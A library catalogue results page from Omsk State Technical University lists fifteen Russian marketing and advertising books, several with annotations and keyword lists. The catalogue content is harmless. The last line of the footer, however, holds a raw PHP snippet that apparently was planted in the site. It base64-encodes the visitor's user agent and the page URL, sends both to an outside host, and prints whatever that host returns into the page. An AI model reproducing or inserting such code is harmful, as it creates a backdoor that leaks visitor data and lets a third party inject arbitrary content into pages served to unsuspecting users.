Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

142 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Директ маркетинг")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 15
1. 
Бобылева М. П. Рекламный менеджмент [Текст] : Основы проф. деятельности / М. П. Бобылева, 2004. - 240 с.
2. 
Книга директора магазина [Текст] : Практ. рекомендации / В. В. Горлов, Г. Г. Крок, О. Н. Крок и др.; Под ред. С. В. Сысоевой, 2005. - 380 с.
Держатели документа (Информация об экземплярах) 
3. 
Евстафьев, Владимир Александрович. Что, где и как рекламировать: Практические советы [Текст] : Учеб. пособие для вузов по специальности 350700 "Реклама" / В. А. Евстафьев, 2005. - 430 с.
Держатели документа (Информация об экземплярах) 

Вторая написанная в соавторстве книга заведующего кафедрой маркетинга и рекламы Московского государственного университета инженерной экологии, доктора филологических наук, профессора В.А.Евстафьева и кандидата технических наук, доцента В.Н.Ясонова. Рассматривается специфика, преимущества и недостатки традиционных и новых видов носителей рекламы, оцениваются особенности рекламы отдельных товаров и услуг. Приводятся краткие сведения о маркетинговых коммуникациях и рекламном законодательстве. Помимо теории, книга содержит большое количество практических рекомендаций, основанных на личном опыте авторов. Поэтому она будет интересна и полезна не только студентам, но и сотрудникам рекламных агентств, отделов рекламы СМИ и компаний-рекламодателей.

4. 
Лебедев-Любимов, Александр Николаевич. Психология рекламы [Текст] / А. Н. Лебедев-Любимов, 2006. - 384 с.
5. 
Кеворков, Владимир Владимирович. Практикум по маркетингу [Текст] : учеб. пособие для вузов / В. В. Кеворков, Д. В. Кеворков, 2007. - 414, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- SWOT -- АНАЛИЗ -- СТРАТЕГИЧЕСКОЕ -- ПЛАНИРОВАНИЕ -- ПОТРЕБИТЕЛЬ -- ПОСТАВЩИК -- ПАРТНЕР -- ИНТЕРНЕТ -- ПОРТАЛ -- CRM -- ИССЛЕДОВАНИЕ -- АНКЕТИРОВАНИЕ -- ИНТЕРВЬЮИРОВАНИЕ -- МОТИВАЦИЯ -- ЛОЯЛЬНОСТЬ -- РАНЖИРОВАНИЕ -- АССОРТИМЕНТ -- КАЧЕСТВО -- ПРОДАЖА -- МОНИТОРИНГ -- КОНКУРЕНТ -- ТОВАРОДВИЖЕНИЕ -- ДИЛЕР -- БРЕНД -- ДИСТРИБЬЮТОР -- ПРОМО -- АКЦИЯ -- МЕРЧАНДАЙЗИНГ -- ЭЛЕКТРОННАЯ -- ТОРГОВЛЯ -- ПАБЛИК РИЛЕЙШНЗ -- МЕДИАПЛАНИРОВАНИЕ -- БРИФ -- ДИРЕКТ МАРКЕТИНГ -- РЕИНЖИНИРИНГ -- ПЛАН -- РЕВИЗИЯ -- АУДИТ
Держатели документа (Информация об экземплярах) 

Рассматриваются процессы разработки <стратегии> и <миссии> <компании>, создания единой информационной среды, методика анализа <конъюнктуры> <рынка> <товаров> (<услуг>) и его <сегментирование>. Изложены следующие аспекты маркетинговой деятельности: жизненный цикл товара, <цена> и <ценообразование>, <реклама> и <стимулирование> <сбыта>. Приводятся регламент бизнесс-процесса, обширный практический материал, словарь терминов.

6. 
Ландреви, Жак. Меркатор. Теория и практика маркетинга [Текст] : в 2 т.: пер. с фр. Т. 1, 2006. - 656, [7] с.
Ключевые слова 
МЕНЕДЖМЕНТ -- РЫНОК -- ЦЕНА -- СПРОС -- ОНЛАЙН -- БРЕНД -- ОПРОС -- ИНТЕРНЕТ -- ПОТРЕБИТЕЛЬ -- ЛИЧНОСТЬ -- ПРОГНОЗИРОВАНИЕ -- МОНИТОРИНГ -- ЭКСПЕРТНАЯ -- ОЦЕНКА -- ПРОДАВЕЦ -- ПОКУПКА -- ЭКОНОМЕТРИКА -- ТОВАРНАЯ -- ПОЛИТИКА -- ТОВАР -- ДИЗАЙН -- УПАКОВКА -- АССОРТИМЕНТ -- ЦЕНОВАЯ -- ИЗДЕРЖКА -- КОНКУРЕНТ -- ДИСТРИБЬЮТОР -- ЦЕНООБРАЗОВАНИЕ -- СКИДКА -- СБЫТ -- КОНФЛИКТ -- ЭЛЕКТРОННАЯ -- ТОРГОВЛЯ -- ПРОДАЖА -- МЕРЧАНДАЙЗИНГ -- КОММУНИКАЦИОННАЯ -- РЕКЛАМА -- СМИ -- МЕДИАПЛАНИРОВАНИЕ -- ДИРЕКТ МАРКЕТИНГ -- E-MAIL -- СВЯЗЬ С ОБЩЕСТВЕННОСТЬЮ -- ШЕФСТВО -- СПОНСОРСТВО -- МЕЦЕНАТСТВО -- ДИСТРИБУЦИЯ
Держатели документа (Информация об экземплярах) 
7. 
Российский рекламный ежегодник [Текст] / Совет ассоц. медийн. индустрии, Междунар. реклам. ассоц., 2003. - 130 с.
Держатели документа (Информация об экземплярах) 
8. 
Рожков, Игорь Яковлевич. Реклама: планка для профи [Текст] / И. Я. Рожков, 1997. - 205, [1] с.
Держатели документа (Информация об экземплярах) 
9. 
Рогожин, Михаил Юрьевич. Теория и практика рекламной деятельности [Текст] : Учеб. пособие / М. Ю. Рогожин, 2001. - 206 с.
Держатели документа (Информация об экземплярах) 
10. 
Кусков Ю. В. "Бег к вершинам мастерства.." или классический маркетинг на рынке сварочных материалов [Текст]Вып. 5 / Ю. В. Кусков, 2000. - 88 с.
11. 
Терещенко, Владимир Михайлович. Маркетинг: новые технологии в России [Текст] / В. М. Терещенко, 2001. - 415 с.
12. 
Джефкинс, Френк. Реклама [Текст] : Учеб. пособие для вузов по специальности 350700 - Реклама / Ф. Джефкинс; Пер. с англ. Г. Ю. Любимовой и др.; Под ред. Б. Л. Еремина, 2002. - 523 с.
Держатели документа (Информация об экземплярах) 
13. 
Оганесян, Анна Арменаковна. Рекламная деятельность [Текст] : Конспект лекций / А. А. Оганесян, 2002. - 160, [1] с.
Держатели документа (Информация об экземплярах) 
14. 
Феофанов, Олег Александрович. Реклама: новые технологии в России [Текст] : Учеб. пособие для подгот. профессионалов в сфере рекламы / О. А. Феофанов, 2001. - 376, [1] с.
Держатели документа (Информация об экземплярах) 
15. 
Феофанов, Олег Александрович. Реклама: новые технологии в России [Текст] : Учеб. пособие для подгот. профессионалов в сфере рекламы / О. А. Феофанов, 2000. - 376, [1] с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3048 - 14.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.83 с.12 запросов, 0.46c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;